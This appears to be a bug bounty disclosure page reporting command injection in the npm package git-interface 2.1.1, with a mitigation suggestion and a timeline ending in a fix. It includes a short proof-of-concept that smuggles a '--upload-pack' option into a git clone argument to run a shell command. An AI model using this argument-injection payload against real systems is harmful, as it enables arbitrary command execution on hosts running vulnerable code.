Command Injection vulnerability in git-interface@2.1.1 in yarkeev/git-interface


Reported on

Apr 16th 2022

Command Injection vulnerability in git-interface@2.1.1

git-interface describes itself as a Interface to work with a git repository in node.js


  • Project's GitHub source code:
  • Project's npm package:

I'm reporting an OS Command Injection vulnerability in git-interface npm package. The API may be abused if user input is able to provide a valid directory on disk and supply the destination directory to clone a repository too.

Proof of Concept exploit

Install git-interface@2.1.1 which is the latest.

Run the following code, with the following precondition, in which the /tmp/new directory needs to exist (doesn't need to be a .git initialized directory though), and so, you could provide a predictable path like say /usr/src:

const { Git } = require('git-interface');

const git = new Git({
    dir: '/tmp/new' //default path is current directory

git.clone('file:///tmp/new', '--upload-pack=echo>/tmp/pwned');

Observe a new file created: /tmp/pwned

Mitigation suggestions

Use the shell -- notation as a suffix of the supported command-line arguments (if at all), to then make sure that input passed to the git command is positional arguments rather than command-line arguments. For example: git clone -- <path> <destination> would prevent path and destination from being interpreted as command-line arguments for the git command.


Liran Tal


If both are provided by user input, then the use of a --upload-pack command-line argument feature of git is also supported for git clone, which would then allow for any operating system command to be spawned by the attacker.

We are processing your report and will contact the yarkeev/git-interface team within 24 hours. a year ago
We created a GitHub Issue asking the maintainers to create a a year ago
We have contacted a member of the yarkeev/git-interface team and are waiting to hear back a year ago
We have sent a follow up to the yarkeev/git-interface team. We will try again in 7 days. a year ago
yarkeev validated this vulnerability a year ago
Liran Tal has been awarded the disclosure bounty
The fix bounty is now up for grabs
yarkeev marked this as fixed in 2.1.2 with commit f828aa a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE
to join this conversation